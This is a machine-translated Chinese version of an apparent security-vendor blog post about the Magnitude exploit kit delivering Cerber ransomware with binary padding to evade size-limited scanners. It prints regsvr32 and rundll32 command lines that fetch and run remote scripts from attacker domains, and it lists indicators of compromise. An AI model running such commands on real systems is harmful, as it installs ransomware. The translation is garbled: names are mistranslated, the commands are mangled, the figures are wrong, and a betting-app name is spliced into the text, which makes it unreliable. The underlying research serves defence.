Cerber勒索软件以不同数量级的格式发布

作为我们对星等开发工具包及其门的后续研究(我们在以前的博文)，我们来看一看一个有趣的技术用于分配刻耳柏树ransomware．

利用包是一种非常有效的服务恶意负载的方法，一个重要的方面是其传递机制本身。典型的场景是利用代码将有效负载下载到磁盘，然后运行它。但也有例外，我们在过去已经看到:

• 下载一个加密的有效负载，然后在磁盘上分成两个不同的二进制文件(ref:Redkit开发套件做劈叉）
• 有效载荷直接下载到内存中，没有接触磁盘AKA无文件(ref:垂钓者EK:现在可以“无文件”感染）

在这种偏离标准驱动下载方法的背后可能有不同的动机，但通常的目标是通过采用一种不太常见的行为来逃避防病毒扫描仪/签名。

今天，我们来看看另一项技术这是由星等EK公司使用的在运行前，有效载荷很大程度上是膨胀的。

概述

在几个月的时间里，Magnitude漏洞工具包一直在使用一个XML配置文件来检索恶意软件有效载荷(Cerber)，一些研究人员在[1][2][3]之前就遇到了这个问题。

根据我们的捕捉，大约在7月底，我们发现了一个新的for循环它赋值一个被连接的变量。这段代码将“垃圾”添加到现有的Cerber二进制文件中，使其初始大小从245kb *增长到70到100mb *。

图1:从规模EK到通过更大的恶意二进制文件感染Cerber的工作流

*这些数字来自一个特定的捕获，并将根据星等EK的变化而变化

这不是一个漏洞，而是，正如他们所说的，“一个功能”，允许绕过安全产品，他们可以扫描的文件大小有硬限制。在这篇文章的剩余部分，我们将描述这个被称为二进制填充的过程是如何在星等EK实现的。

交付链

量级EK因专门向特定地点，特别是韩国，传播塞伯勒索软件而臭名昭著，通过它自己的门，叫做Magnigate．一段时间以来，我们已经注意到，量级EK一直在使用Internet Explorer漏洞，而没有必要诉诸于Flash的利用。EK流程的另一个有趣的工件部分是使用包含JScript代码的XML配置文件。

图2:显示EK的主要工件的网络流量视图

XML配置

在之前的EK量级的例子中，regsvr32.exe使用作为URL参数传递的scriptlet来检索和执行二进制有效负载(不进行任何大小修改)。最初，我们看到有效载荷是从%temp%文件夹启动的，但在7月中旬的某个时候，它也从桌面运行(也许是一个过渡?)

" C: Windows System32\regsvr32.exe " scrobj.dll /s /u /n /i:http://e6cgbdc11cx350s4.lessnot.men/f62241e72664fd04fed6f79656757d9d.sct .exe "

7月31日，我们注意到了rundll32.exe使用一个看起来不同的命令仍然解析远程脚本:

图3:从浏览器利用到通过rundll32恶意的JScript

“C: \ Windows \ System32系统\ rundll32.exe”javascript:“\ . . \ [RunHTMLApplication”;document . write (); GetObject('脚本:http://7fm0cd7d16w37.noneno.space/4a44e2019f2e77c83f55c5c223bf10a0”);

图4:XML配置，显示了嵌入的JScript

二进制填充

这个脚本的目的是检索原始Cerber有效负载(245kb)，并通过一种称为二进制填充．Shell应用程序使用ADODB。流以保存“文本”数据(N4mQj8624F9Npw10s61F)，使用特定字符集(iso - 8859 - 1)用于文本到二进制数据的转换。

这个数据达到95 MB的原因是，它通过循环连接字符串14次，这相当于写入“N4mQj8624F9Npw10s61F“4,7829.69亿次(3^14)并将其保存到一个文件。

图5:通过追加数百万次文本字符串来生成膨胀的二进制文件

rundll32.exe下载原始的Cerber，并在运行中添加垃圾数据:

图6:流程视图，显示正在将数据写入新的膨胀的Cerber二进制文件

图7：最终二进制文件的十六进制视图，显示添加的“垃圾”数据

最后，它运行它:

图8:通过rundll32调用新的Cerber二进制文件

几秒钟后，Cerber加密了文件并显示了勒索信:

图9:墙纸劫持显示了勒索信

行当

虽然《星等EK》的发行渠道非常狭窄，但它仍然是一个有趣的开发工具，因为它不仅有自己的开发工具门，但它也继续发展各种各样的技巧。二进制填充技术显示了绕过某些安全扫描器的努力，这些扫描器会忽略超过一定大小的文件。然而，这并不能阻止恶意二进制文件(无论多大)运行并完全感染计算机。

保护

防范这类攻击的关键是阻止威胁，无论威胁的形式如何，并在传递链中尽早挫败它们。必威平台APPMalwarebytes使用其防exploit模块主动停止星等EK之前恶意负载甚至被下载。作为一个额外的保护层，我们的反勒索软件组件也阻止这个“比平常更大”的Cerber。

图10:Malware必威平台APPbytes在驱动下载尝试时阻塞了Magnitude漏洞工具包

图11:Malware必威平台APPbytes(为测试禁用了其他保护模块)阻止勒索软件感染

参考文献

［1］https://pcsxcetrasupport3.wordpress.com/2017/04/24/a-look-at-the-magnitude-exploit-kit-encoding/

[２]https://www.zscaler.com/blogs/research/wonder-woman-piracy-and-cerber-ransomware

［3］https://zerophagemalware.com/2017/08/01/magnitude-ek-xml-package-and-changes/

妥协的指标

埃克级

217.182.227.103,spinner-art.org,Magnigate (step 1) 151.80.246.147,511bcl9645285d2w.himlead.com,Magnigate (step 2) 51.254.229.220,7fm0cd7d16w37.noneno。登陆51.254.229.220,7fm0cd7d16w37.noneno。空间、XML / JScript 51.254.229.220级、7 fm0cd7d16w37.noneno。空间,Cerber(原始)

Cerber(原始)

4 bdd366d8ee35503cf062ae22abe5a4a2d8d8907

Cerber(膨胀)

3 da8e94c6d1efe2a039f49a1e748df5eef01af5a